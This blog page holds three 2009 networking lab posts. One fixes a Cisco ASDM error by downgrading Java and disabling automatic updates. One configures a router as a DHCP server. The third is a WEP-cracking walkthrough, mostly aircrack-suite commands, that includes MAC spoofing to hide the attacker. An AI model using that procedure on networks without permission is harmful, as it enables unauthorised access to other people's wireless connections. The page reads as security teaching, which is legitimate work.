Saturday, January 17, 2009

Cisco ASDM: Unconnected sockets not implemented

Yesterday, I was trying to use GNS3 to simulate PIX firewall and configure VPN connect in a vmware virtual machine (Windows XP). The version I was using is pix802.bin and asdm-603.bin. After everything is settled, I started the ASDM, and I got this error:

“ASDM is unable to continue loading, Click OK to exit from ASDM.

Unconnected sockets not implemented”


It is weird, because I did the same settings before (in the same virtual machine), and it was no problem at all, what cause this problem? The only thing I did to this virtual machine was I just upgrade the Java version to “Java™ 6 Update 11”, I begun to doubt the incompatible of new Java and ASDM, so I just uninstalled “Java 6 Update 11”, and installed the old “Java 6 Update 7” (the version I used before), and it works. I finally got the ASDM management interface.

 

Here’s what I’ve done:

1.       Go to http://java.sun.com/products/archive/j2se/6u7/index.html and download “Java SE 6 Update 7”

2.       Uninstall “Java 6 Update 11”.

3.       Install jre-6u7-windows-i586-p.exe

4.       Open “Control panel”-> “Java”, tab “Update”, uncheck “check for updates automatically”




5.       Now you should be able to run ASDM

Thursday, January 8, 2009

Configure Cisco 2600 Router as a DHCP Server

Lab Section:  Router and Routing Protocol

Lab Title: Configure Cisco 2600 Router as a DHCP Server

 

Purpose:

1.       Understand how to configure Cisco 2600 as a DHCP server.

2.       Understand how the DHCP server distribute IP

 

Preparation:

1.       DHCP, ARP, DNS.

 

Topological:

 

Requires:

1.       Don’t distribute IP address 172.20.30.1 and from 172.20.30.200 to 172.20.30.254

2.       Default gateway is 172.20.30.254.

3.       Dns server is 208.67.222.222

4.       The ranger of IP that can be distributed is 172.20.0.0/16

 

Procedure:

1. Open a terminal to setup the router:

Router>en

Router#conf t

Router(config)#ip dhcp excluded-address 172.20.30.1

Router(config)#ip dhcp excluded-address 172.20.30.200 172.20.30.254

Router(config)#ip dhcp pool testdhcp

Router(dhcp-config)#?

  default-router  Default routers

  dns-server      Set name server

  exit            Exit from DHCP pool configuration mode

  network         Network number and mask

  no              Negate a command or set its defaults

Router(dhcp-config)#default-router 172.20.30.254

Router(dhcp-config)#dns-server 208.67.222.222

Router(dhcp-config)#network 172.20.30.0 255.255.0.0

Router(dhcp-config)#end

 

Router#conf t

Router(config)#interface fastEthernet 0/0

Router(config-if)#ip address 172.20.30.1 255.255.0.0

Router(config-if)#no shut

Router(config-if)#end

 

2.       Check the PC’s IP address. Open a command line window,

> ipconfig /renew

              --- Renew the IP address.

> ipconfig /all

              --- Show current IP setting.

 

 

3.       Back to the terminal of router:

Router#show arp          

---Display Arp table

Router#show ip dhcp binding

       --- Display all the distributed IP

*******************************************************************************

1.      For more information, please visit my blog http://jhuang8.blogspot.com/.

2.       Video demo is located in http://www.valit.ca/lab/.

Saturday, January 3, 2009

Lab4 Crack WEP using Blacktrack3.0 live CD

Lab Section:  Wireless Security

Lab Title: Crack WEP using Blacktrack3.0 live CD

 

Purpose:

1.       Understand how WEP works.

2.       Understand the method of cracking WEP

3.       Warning: It is illegal to crack other peoples’ wireless connection without their permission. this tutorial is for educational purposes only

 

Preparation:

1.       Check if your wireless card is supported by Blacktrack: http://backtrack.offensive-security.com/index.php?title=HCL:Wireless

2.       Detect, sniff, inject wireless network

3.       Always can use “man [command]” to get the description of the command.

 

Tools:

1.       airmon-ng: change the wireless card into monitor mode.

2.       ifconfig: configure a card

3.       iwconfig: configure a wireless card

4.       macchanger: change the mac address of a networking card

5.       airodump-ng: capture packets

6.       aireplay-ng: generate traffic by injecting ARP-request packets into a wireless network.

7.       commview for wifi: (optional) generate traffic.

 

Procedure:

 

1. Get the target AP’s information (BSSID, ESSID, channel etc.)

Open a terminal window.

# cd /tmp

# iwconfig                          

-- Show and get the wireless device name.

# airodump-ng [device]        

-- Once you get the information, press crtl+c to stop the capture, then copy and paste the target AP’s information to a notepad.

 

2. Change the wireless card’s MAC address

# macchanger –s rausb0

       -- Show the wireless card’s MAC address

# airmon-ng stop [device]

       -- turn wireless card into manage mode.

# ifconfig [device] down

       -- Turn off the wireless card; otherwise you can not change the MAC address.

 

# macchanger –a rausb0

-- Change the MAC of the wireless card to a faked MAC. An attacker always wants to hide himself. This is a necessary step for attack purpose.

# ifconfig [device] up

       -- Turn on the wireless card.

 

3. Change the wireless card into monitor mode

# airmon-ng start [device]

       -- Enable the monitor mode

# iwconfig

       -- Make sure the wireless card is in the Monitor mode.

 

4. Capture packets:

# airodump-ng –c [channel] –w [file name] –-bssid [AP’s bssid] --ivs [device]

-- To understand the parameter’s meaning, type “airodump --help” or “man airodump”. Leave this window opened

 

5. Associate the wireless card with the target AP:

Open a new terminal window

# aireplay-ng -1 0 -e [essid] -a [bssid] -h [wireless card’s MAC] [device]

  -- To understand the parameter’s meaning, type “aireplay --help” or “man aireplay”.

 

6. Generate traffics:

# aireplay-ng -3 –b [bssid] –h [wireless card’s MAC address] [device]

  -- To understand the parameter’s meaning, type “aireplay --help” or “man aireplay”. Leave this window opened. Additionally, you can use commview for wifi to generate traffics to increase the crack process.

 

7. Crack the password:

Open a new terminal window

# cd /tmp

# aircrack-ng –b [bssid] *.ivs

 

*******************************************************************************

1.       For more information, please visit my blog http://jhuang8.blogspot.com/.

2.       Video demo is located in http://www.valit.ca/lab/.